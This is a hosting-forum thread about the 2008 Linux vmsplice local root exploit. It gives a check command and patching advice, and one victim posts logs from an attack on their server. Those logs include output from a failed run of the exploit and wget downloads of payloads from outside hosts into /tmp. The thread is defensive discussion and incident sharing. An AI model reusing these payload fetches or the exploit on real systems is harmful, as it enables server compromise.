Linux vmsplice()Root Exploit

andyreed

andyreed

Verified User
Joined
Nov 28, 2004
Messages
264
Location
Minneapolis, MN
On Saturday February 10th, 2008, a new public exploit was released that utilizeed a similar flaw in vmsplice (vmsplice_to_pipe function) which allows a local user to gain root privileges. This exploit affects Linux kernels v2.6.17 and higher.

vmsplice exploit code is available at: http://www.securityfocus.com/bid/27704/exploit

Once an attacker runs the code and gains root privilages, he/she will then be able to read and write to arbitrary memory locations on affected servers.

How can I discover if my system is vulnerable:
SSH to the server and run the following command:
/bin/grep -ri vmsplice /boot/System.map-$(uname -r)

Click here to learn more about this exploit.
 
Somebody know how to patch kernel without recompiling? centos, fedora
 
Just distros have updated their kernels by now. I suggest you all attempt to update your kernels via your upstream distro update channels.

Also not this is a local root exploit... and not one you'll see from remote attack vectors.

It is recommended that you do patch it... as its possible a rogue webscript could use it to gain root access.
 
Many systems are configured to update but not install kernels.

And remember you do have to restart your server to switch to the new kernel.

Jeff
 
i have just come across this exploit only by losing root access which could have been done with this exploit and have installed newest kernel and have rebooted but yet the c0491353 T sys_vmsplice line is still coming up just a differen number any ideas ?
 
c0491353 T sys_vmsplice is what i get with /bin/grep -ri vmsplice /boot/System.map-$(uname -r) and my kernel is 2.6.18-53.1.14.el5 hope this helps
 
im sure i was had off by this exploit at some point they erased all my server and used it for DDOS :(

now im secure

install nessus security scanner on you own pc and scan your server to see how secure you are!
 
Last edited:
install nessus security scanner on you own pc and scan your server to see how secure you are!
Click to expand...

Yeah, because security scanners will tell you anything. Just saying, solely relying on those is a bad practice.
 
nessus has been proven to be the best one that has the least false positives and has worked to track down problems for me in the past.

read it in a pc mag and out of all the ones they've tryed it was the best in the labs to show possible ways to exploit the machines.
 
but this doesn't help me to fix the exploit which was fixed in the previous version of the kernel to which im currently using and you would think they would keep the fix in the newer kernel else would mean people would have to downgrade there kernel and if this was the case why release a kernel without the fix ?
 
I had attempt of attack. Happily I have kernel with grsec patch.
Program start up from /tmp, which was without noexec, because I modernized software :)
Below execution log and apache error_log:
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e74000 .. 0xb7ea6000
[-] vmsplice: Bad address


[Sun Feb 15 01:14:32 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 01:14:32 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 01:14:32 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:20:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:22:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:22:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:22:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:22:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:22:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:29:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:31:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:31:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:31:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:31:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:31:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:40:58 2009] [error] [client 212.227.48.57] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 04:37:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 04:39:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 04:39:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 04:39:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 04:39:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 04:39:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:45:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:47:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:47:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:47:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:47:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:47:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:54:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:56:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:56:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:56:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:56:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:56:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
--07:56:26-- http://crossback.de/23.txt
=> `/tmp/23.txt'
Resolving crossback.de... 77.37.17.225
Connecting to crossback.de|77.37.17.225|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,835 (17K) [text/plain]

0K .......... ....... 100% 1.56 MB/s

07:56:26 (1.56 MB/s) - `/tmp/23.txt' saved [17835/17835]

kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
--07:57:55-- http://naughtyvibez.at/nou
=> `nou'
Resolving naughtyvibez.at... 84.16.255.129
Connecting to naughtyvibez.at|84.16.255.129|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10,920 (11K) [text/plain]

0K .......... 100% 1.02 MB/s

07:57:56 (1.02 MB/s) - `nou' saved [10920/10920]

[Sun Feb 15 08:02:14 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 08:04:14 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 08:04:14 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 08:04:14 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
 
You must log in or register to reply here.
Back
Top